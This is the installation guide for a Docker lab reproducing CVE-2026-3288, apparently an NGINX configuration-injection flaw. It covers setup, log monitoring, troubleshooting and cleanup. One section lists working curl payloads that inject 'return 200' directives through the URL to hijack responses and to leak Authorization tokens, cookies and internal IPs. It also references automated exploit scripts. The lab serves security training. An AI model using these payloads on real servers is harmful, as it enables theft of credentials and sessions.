README.md
Rendering markdown...
# CVE-2026-3288 Lab - Installation Guide
## Quick Installation
### Prerequisites Check
```bash
# Check Docker
docker --version
# Required: Docker 20.10+
# Check Docker Compose
docker-compose --version
# Required: Docker Compose 1.29+
# Check Python
python3 --version
# Required: Python 3.6+
# Check curl
curl --version
```
### Step-by-Step Installation
#### 1. Navigate to Lab Directory
```bash
cd CVE-2026-3288-lab
```
#### 2. Make Scripts Executable
```bash
chmod +x exploits/*.sh
chmod +x exploits/*.py
chmod +x detection/*.sh
chmod +x cleanup/*.sh
```
#### 3. Start the Lab
```bash
# Start all containers
docker-compose up -d
# Check status
docker-compose ps
```
Expected output:
```
NAME STATUS
cve-2026-3288-backend Up
cve-2026-3288-nginx Up
cve-2026-3288-monitor Up
```
#### 4. Verify Installation
```bash
# Test backend
curl http://localhost:8080/
# Test NGINX
curl http://localhost/
# Test health endpoint
curl http://localhost/health
```
#### 5. View Logs
```bash
# All logs
docker-compose logs
# NGINX logs only
docker-compose logs nginx
# Follow logs
docker-compose logs -f
```
## Running Exploits
### Automated Exploitation
```bash
cd exploits
# Install Python requirements
pip3 install requests
# Run all exploits
python3 exploit.py --all
# Run specific exploit
python3 exploit.py --hijack
python3 exploit.py --creds
python3 exploit.py --redirect
```
### Manual Exploitation
```bash
cd exploits
# Make executable
chmod +x test-exploits.sh
# Run manual tests
bash test-exploits.sh
```
### Individual Exploit Examples
```bash
# Response hijacking
curl 'http://localhost/api" return 200 "HACKED'
# Credential theft
curl -H "Authorization: Bearer secret" \
'http://localhost/login" return 200 "Token: $http_authorization'
# Cookie theft
curl -H "Cookie: session=abc123" \
'http://localhost/" return 200 "Cookies: $http_cookie'
# Internal IP leak
curl 'http://localhost/" return 200 "IP: $server_addr'
```
## Monitoring and Detection
### Start Log Monitoring
```bash
cd detection
# Make executable
chmod +x monitor-logs.sh
# Start monitoring
bash monitor-logs.sh
```
### Manual Log Inspection
```bash
# View access logs
docker-compose logs nginx | grep -E 'return|rewrite'
# View error logs
docker-compose logs nginx | grep ERROR
# Export logs
docker-compose logs nginx > nginx-logs.txt
```
## Troubleshooting
### Port Already in Use
```bash
# Check what's using port 80
sudo lsof -i :80
# Option 1: Stop conflicting service
sudo systemctl stop apache2 # or nginx
# Option 2: Change port in docker-compose.yml
# Edit ports section: "8080:80" instead of "80:80"
```
### Containers Won't Start
```bash
# Check Docker daemon
sudo systemctl status docker
# View detailed logs
docker-compose logs
# Rebuild containers
docker-compose down
docker-compose build --no-cache
docker-compose up -d
```
### NGINX Configuration Errors
```bash
# Test NGINX config
docker exec cve-2026-3288-nginx nginx -t
# View config
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf
# Restart NGINX
docker-compose restart nginx
```
### Backend Not Responding
```bash
# Check backend logs
docker-compose logs backend
# Test backend directly
docker exec cve-2026-3288-backend curl http://localhost:5000/
# Restart backend
docker-compose restart backend
```
### Python Script Errors
```bash
# Install missing dependencies
pip3 install requests
# Run with verbose output
python3 exploit.py --all -v
# Check Python version
python3 --version # Should be 3.6+
```
## Cleanup
### Stop Lab
```bash
# Stop containers
docker-compose stop
# Stop and remove containers
docker-compose down
# Remove containers and volumes
docker-compose down -v
```
### Complete Cleanup
```bash
cd cleanup
# Make executable
chmod +x cleanup.sh
# Run cleanup script
bash cleanup.sh
```
### Manual Cleanup
```bash
# Remove containers
docker-compose down -v
# Remove images
docker rmi cve-2026-3288-lab_nginx
docker rmi cve-2026-3288-lab_backend
# Remove volumes
docker volume prune
# Remove networks
docker network prune
```
## Verification Checklist
- [ ] Docker and Docker Compose installed
- [ ] Lab containers running (`docker-compose ps`)
- [ ] NGINX responding on port 80
- [ ] Backend responding on port 8080
- [ ] Exploit scripts executable
- [ ] Python requests library installed
- [ ] Can run automated exploits
- [ ] Can run manual exploits
- [ ] Log monitoring working
## Next Steps
After successful installation:
1. Read the main [README.md](README.md) for vulnerability details
2. Review [payloads.txt](exploits/payloads.txt) for exploit examples
3. Run automated exploits: `python3 exploits/exploit.py --all`
4. Try manual exploitation: `bash exploits/test-exploits.sh`
5. Monitor logs: `bash detection/monitor-logs.sh`
## Support
If you encounter issues:
1. Check the Troubleshooting section above
2. Review Docker logs: `docker-compose logs`
3. Verify prerequisites are met
4. Ensure no port conflicts
5. Try rebuilding: `docker-compose build --no-cache`
---
**For authorized security training only**